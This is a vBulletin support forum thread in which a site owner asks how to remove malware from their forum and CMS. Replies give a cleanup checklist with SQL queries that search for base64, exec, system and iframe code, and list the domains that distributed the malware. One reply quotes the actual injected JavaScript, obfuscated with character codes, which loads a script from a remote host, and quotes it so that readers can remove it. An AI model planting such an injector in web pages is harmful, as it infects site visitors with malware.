Announcement

Collapse
No announcement yet.

I have a malware!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] I have a malware!

    From two days, my website is affected by malware (directmarketingprompt.in). My hosting (Aruba.it) says it's a script problem of vbulletin.
    I have installed the ultimate security patch but the problem persist.

    Please help me.

  • #2
    it is not vb problem

    Comment


    • #3
      So what's my problem? please, give me a solution

      Comment


      • #4
        What exactly is happening, what is the URL to your forum?
        -- Web Developer for hire
        ---Online Marketing Tools and Articles

        Comment


        • #5
          www.retrogaminghistory.com

          If you enter with google chrome a alert message appear

          Comment


          • #6
            Originally posted by Snakefrancesco View Post
            www.retrogaminghistory.com

            If you enter with google chrome a alert message appear
            I can look when I go home for lunch.. It looks like this site is blocked at my work.
            Maybe a screenshot of the alert would help as well?
            -- Web Developer for hire
            ---Online Marketing Tools and Articles

            Comment


            • #7
              This malware seems to be present only in the cms, in forum and blog will not get the message alert.

              how can I remove this malware?

              Comment


              • #8
                Originally posted by TheNewOne View Post
                it is not vb problem
                LOL! I often wonder why people even offer to reply if there replies are like that.

                Here is a screener of the detections i got when visiting your site.



                Had anything changed on your site in recent days apart from the upgrade?
                Added mods or anything like that?
                FTW Forum <- Home of the damned!

                Comment


                • #9
                  If you're running it, it's a vBSEO script injection vulnerability. Patch available on their site.
                  snerd

                  Comment


                  • #10
                    Originally posted by TheNewOne View Post
                    it is not vb problem
                    Very helpful...

                    Originally posted by Snakefrancesco View Post
                    From two days, my website is affected by malware (directmarketingprompt.in). My hosting (Aruba.it) says it's a script problem of vbulletin.
                    I have installed the ultimate security patch but the problem persist.

                    Please help me.
                    To check a site for compromises follow these steps:

                    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

                    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7

                    5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

                    The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
                    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

                    If you a plugin that you can't read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.

                    7) Using PHPMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

                    It checks the templates for compromising code. You will need to review the results from this. If you can't read it or the code is obfuscated then you should revert the template in the Admin CP.

                    8) Check .htaccess to make sure there are no redirects there.

                    9) Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
                    Vote for:

                    - *Admin Settable Paid Subscription Reminder Timeframe*
                    -
                    *PM - Add ability to reply to originator only*
                    - Add Admin ability to auto-subscribe users to specific channel(s)
                    - Highlight the correct navigation tab when you are on a custom page
                    - "Quick Route" Interface...
                    - Allow to use custom icons for individual forums

                    Comment


                    • #11
                      Grazie! Thank you for help me, seems that malware was deleted forever

                      Comment


                      • #12
                        HEEELLLPPP!!! this is a nightmare! malware is still on the site, I do not know anymore what to do...

                        I change the server password, Run Suspect File Diagnostics, delete suspicious file...

                        Please help me

                        Comment


                        • #13
                          If you have installed vbSEO then apply the patch available from them. Read the thread on these topics @vbseo.com:
                          http://www.vbseo.com/f5/vbseo-securi...release-52783/
                          http://www.vbseo.com/f5/faqs-rogue-p...release-52862/
                          Check if the plugins that are listed in the vbseo.com thread have been added to your system.

                          If you have installed vbadvanced, upgrade to the latest version.
                          http://www.vbadvanced.com/forum/showthread.php?t=44720

                          Remove all instances of this from your database:
                          <script type="text/javascript">
                          <!--
                          // Main vBulletin Javascript Initialization
                          var script=document.createElement(String.fromCharCode(115,9
                          9,114,105,112,116));script.src=String.fromCharCode(104,116,1
                          16,112,58,47,47,103,97,117,115,115,45,104,111,115,116,46,105
                          ,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105
                          ,98,105,108,105,116,121,46,106,115);var head=document.getEle
                          mentsByTagName(String.fromCharCode(104,101,97,100))[0];head.
                          appendChild(script);vBulletin_init();
                          //-->
                          </script>
                          Change all passwords and secure your non-public directories. Scan your computers for infection.

                          Update all addons and vbulletin to the latest version.
                          I buy 420 forums

                          Comment


                          • #14
                            Originally posted by Snakefrancesco View Post
                            HEEELLLPPP!!! this is a nightmare! malware is still on the site, I do not know anymore what to do...

                            I change the server password, Run Suspect File Diagnostics, delete suspicious file...

                            Please help me
                            I would do all of what Trevor suggested and also what Alfa suggested.
                            It appears you were able to get rid of it temperarely so its quite possible you have some outdated mod or other vulnerability we dont have.
                            Thats why it come back. I see your site is now listed as below.

                            This web page at www.retrogaminghistory.com has been reported as an attack page and has been blocked based on your security preferences.

                            Perhaps you should disable all mods and start there?

                            Of the 23 pages we tested on the site over the past 90 days, 10 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-03-31, and the last time suspicious content was found on this site was on 2012-03-31.Malicious software includes 3 trojan(s), 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
                            Malicious software is hosted on 8 domain(s), including strongirmaster.byinter.net/, directmarketinglinearsale.in/, local15promo.in/.
                            8 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including js-hosting.in/, directmarketing22forwardsale.in/, directmarketinglead-trade.in/.
                            This site was hosted on 2 network(s) including AS31034 (ARUBA), AS15169 (Google Internet Backbone).
                            FTW Forum <- Home of the damned!

                            Comment


                            • #15
                              I have a malware!

                              Make sure you have got a good quality anti virus software installed on your pc. It will prevent viruses and malware from hitting your computer.
                              Aussiefootyforums

                              New Site New forum
                              Come and talk sports all day long


                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X